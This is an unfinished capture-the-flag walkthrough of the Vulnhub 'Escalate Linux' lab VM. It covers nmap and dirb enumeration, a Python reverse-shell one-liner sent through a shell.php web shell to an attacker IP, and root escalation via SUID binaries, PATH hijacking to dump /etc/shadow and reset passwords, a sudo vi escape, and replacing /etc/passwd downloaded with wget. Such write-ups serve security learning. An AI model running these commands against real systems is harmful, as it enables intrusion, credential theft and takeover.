> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/escalate-linux.md).

# Escalate Linux < NOT FINISH >

Escalate Linux Vulnhub Walkthrough

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/EsLinux 192.168.1.114
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-20 06:58 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42718/udp6  mountd
|   100005  1,2,3      51050/udp   mountd
|   100005  1,2,3      53745/tcp6  mountd
|   100005  1,2,3      59791/tcp   mountd
|   100021  1,3,4      33361/tcp6  nlockmgr
|   100021  1,3,4      38815/tcp   nlockmgr
|   100021  1,3,4      43707/udp   nlockmgr
|   100021  1,3,4      57591/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     3 (RPC #100227)
MAC Address: 00:0C:29:2C:24:CB (VMware)
Service Info: Host: LINUX

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2020-05-20T06:58:42-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-20T10:58:42
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds
```

### dirb

```
dirb http://192.168.1.114/ -X .php
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 21 23:26:47 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/shell.php (CODE:200|SIZE:29)                                                                                      
                                                                                                                                         
-----------------
END_TIME: Thu May 21 23:26:52 2020
DOWNLOADED: 4612 - FOUND: 1

```

We can see here we have the shell.php, let's put it in the browser

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uLMj2EQT3ywcR8nlU%2F-M7uQ8DE9tI1Zpknbtgl%2Fimage.png?alt=media\&token=168001be-0a1b-4c0a-a511-df473987ff72)

we pass in the cmd and we can get a response from it

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uLMj2EQT3ywcR8nlU%2F-M7uQILoGNqpe4Ge2JRt%2Fimage.png?alt=media\&token=f7981a5d-2311-4791-a680-96f9de1434b8)

## Reverse shell

We then can set up a listener at our machine by

```
nc -nlvp 4444
```

At the shell, we can use python to get a reverse shell from it

```
192.168.1.114/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uLMj2EQT3ywcR8nlU%2F-M7uQpehls8lhOs4KAYD%2Fimage.png?alt=media\&token=6b093b73-b018-495d-b400-57d2c965ffeb)

Got a shell and type

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uLMj2EQT3ywcR8nlU%2F-M7uQzr4FoFJR8mbOkSm%2Fimage.png?alt=media\&token=ae3aec37-ea96-4984-b1d4-7cca473fcc98)

Then we can start to perform Privilege Escalation.

## Privilege Escalation

### Method 1

We can escalate the privilege by exploiting the SUID rights of some shell file

type&#x20;

```
find / -perm -u=s -type f 2>/dev/null
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7qU9IC48i4lybuswRm%2F-M7rNY2SmPXshF4APkGF%2Fimage.png?alt=media\&token=4681bb6b-0212-4c02-b7e9-bb196f34e5ed)

We can see there are 2 script files running. We first went to the `user3` directory

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7qU9IC48i4lybuswRm%2F-M7rNhe7D3DFgdhzFdPN%2Fimage.png?alt=media\&token=6d4ce1c3-bc06-4e6b-9c15-c975ea10643e)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7qU9IC48i4lybuswRm%2F-M7rNplXjszQc8TCZt3K%2Fimage.png?alt=media\&token=c6232db1-fb8e-47c4-b10f-c9184f78c7da)

We can see that a script file can be run to get root by any users. Type `./shell`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7qU9IC48i4lybuswRm%2F-M7rNzVomTC7_jEsBp6u%2Fimage.png?alt=media\&token=0be60d54-a900-424c-80cf-30b1669c2fcc)

Got root ! Easy !

### Method 2

We can get a root shell by cracking the password.

Navigate to `user5` directory and we can see the script file, after we run the file it returns list of directory indicates it is running the `ls` command

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rPDdjyjFFxPLNRoI3%2F-M7rPUPrHoooeDT8JGVb%2Fimage.png?alt=media\&token=16597428-b4f3-4c34-981c-fd0c9b685717)

Navigate to `/tmp`

Then type

```
echo "cat /etc/shadow" > ls
chmod 777 ls
export PATH=/tmp:$PATH
```

Run the script, then we will get this&#x20;

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rPDdjyjFFxPLNRoI3%2F-M7rQFVyCU10EtvtJg_1%2Fimage.png?alt=media\&token=fc53c0df-53dd-48e6-9ca1-77365c7749a5)

Copy the hash to a file and crack with `john`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7qU9IC48i4lybuswRm%2F-M7qVnvjGf_MPS_cJUBd%2Fimage.png?alt=media\&token=fda5d571-0997-441e-87c1-07c78cfe944f)

We can see that we got the username root and password with `12345`.&#x20;

su into `root` and you will get root lmao.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rPDdjyjFFxPLNRoI3%2F-M7rRd3Qns2IH1MnGpwl%2Fimage.png?alt=media\&token=a48beb74-7c07-4e13-9881-d307169bd9a3)

### Method 3&#x20;

We know that `user5` script can execute with root, so we can use echo and chpasswd to replace the existing password.

By doing that, navigate back to `/tmp` and type `echo 'echo "user1:12345" | chpasswd" > ls` , then `chmod777 ls` and export the path like we did just now

Then go back to `user5` and run the script. Now we can `su` to `user1` and type the password we replace just now which is `12345`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rkChQF_KlLM4ntlBO%2F-M7rnxqL31rQ03lcYesM%2Fimage.png?alt=media\&token=ff3f42cc-42eb-4345-bcd1-83b95bce5fb3)

Now we got into `user1`, type `sudo -l`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rkChQF_KlLM4ntlBO%2F-M7ro2upTcMFbNvqr_ux%2Fimage.png?alt=media\&token=f98155e5-e242-41ba-8bf7-4b346a2a79e9)

Then we can see it has sudo rights to run anything, we can go ahead and type `sudo su` to get&#x20;

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rkChQF_KlLM4ntlBO%2F-M7roG_x16A5-PJ6Ky3y%2Fimage.png?alt=media\&token=c931fdc8-c022-41d2-8db9-5f1b9efaf123)

### Method 4

### Method 5

Using the PATH variable method at method 3, we can do the same for `user8`

After that login into `user8` and type `sudo -l`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rzpBRxUEecJQk6SeH%2F-M7s1AdI8vsEGUQfI8O-%2Fimage.png?alt=media\&token=9412e0c0-0e61-454d-9eeb-29b3a9b53183)

As we can see we have `vi` has sudo rights&#x20;

```
sudo vi -c ':!/bin/sh' /dev/null
```

Then we will get root!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7rzpBRxUEecJQk6SeH%2F-M7s2NIyzzTKJJim-2Rs%2Fimage.png?alt=media\&token=0eb99870-3e9b-4657-a988-27ecb1de2077)

### Method 6

If we type `cat /etc/passwd` , we got this and we can see `user7` `GID` has root access

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7s2Pfy-WvRAsICsxpE%2F-M7s3nDkOggRvmKV_J1B%2Fimage.png?alt=media\&token=7c0290f0-439e-4cbd-ace6-7fe057fdda79)

We can use the PATH variable that we use on `user7`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7s2Pfy-WvRAsICsxpE%2F-M7s82LZFzzwvUGM5XDa%2Fimage.png?alt=media\&token=976f0568-92f8-4129-bd29-340f7d3b74f3)

We can first copy the whole passwd to out machine then add a credentials.

But first we need to create a passwd for our new user, type

```
openssl passwd -1 -salt <salt> <password>
```

For example

```
openssl passwd -1 -salt wow damn
```

After that our machine we can add in the credentials like that

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uDTVB3dPH5IyroDnY%2F-M7uJJ0U7Uj9b-i0-uJh%2Fimage.png?alt=media\&token=9f3cd2aa-69bb-4cda-b10e-5d1476c37056)

then create a `SimpleHTTPServer` using python by typing

```
python -m SimpleHTTPServer
```

At the target machine, navigate to `/etc` directory and type

```
wget -O passwd 192.168.1.113:8000/passwd
```

Then the transfer is successful, we can then `su` to the newly created credentials and type in the password we created.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uDTVB3dPH5IyroDnY%2F-M7uLClc-K3BqWCAnewr%2Fimage.png?alt=media\&token=c72d09cb-e125-4b3a-a11e-7870effcf74a)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7uDTVB3dPH5IyroDnY%2F-M7uLHIe7RHtuJRQyUR2%2Fimage.png?alt=media\&token=ab7eb85f-c504-4600-9b3c-7d79093a9a6f)

Got root !
